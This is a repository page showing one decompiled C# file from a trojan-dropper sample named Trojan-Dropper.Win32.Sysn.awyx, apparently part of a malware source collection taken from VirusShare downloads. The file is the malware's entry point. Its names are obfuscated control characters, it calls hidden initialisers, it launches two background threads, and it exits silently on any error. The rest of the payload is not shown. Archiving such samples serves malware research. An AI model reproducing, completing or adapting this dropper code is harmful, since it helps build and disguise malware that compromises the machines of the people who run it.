MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0001.cs

47 lines
1.4 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0008;
using \u000E;
using \u000F;
using System;
using System.Threading;
namespace \u000F
{
internal static class \u0001
{
public static \u0001 \u0001 = new \u0001();
public static \u0008.\u0008 \u0001 = new \u0008.\u0008();
public static \u0006 \u0001 = new \u0006();
public static \u0005 \u0001 = new \u0005();
private static \u0001 \u0001 = new \u0001();
private static \u000E.\u0008 \u0001 = new \u000E.\u0008();
[STAThread]
private static void \u000F()
{
try
{
\u0001.\u0001.\u000F();
\u0001.\u0001.\u0007 = \u0001.\u0001.\u0010();
\u0001.\u0001.\u0008 = \u0001.\u0001.\u000F();
\u0001.\u0001.\u0016 = \u0001.\u0001.\u000F();
\u0001.\u0001.\u000F();
\u0001.\u0001.\u000F();
\u0001.\u0001.\u000F();
new Thread(new ThreadStart(\u0004.\u000F)).Start();
new Thread(new ThreadStart(\u0007.\u0007.\u000F)).Start();
\u0003.\u000F();
}
catch
{
Environment.Exit(0);
}
}
}
}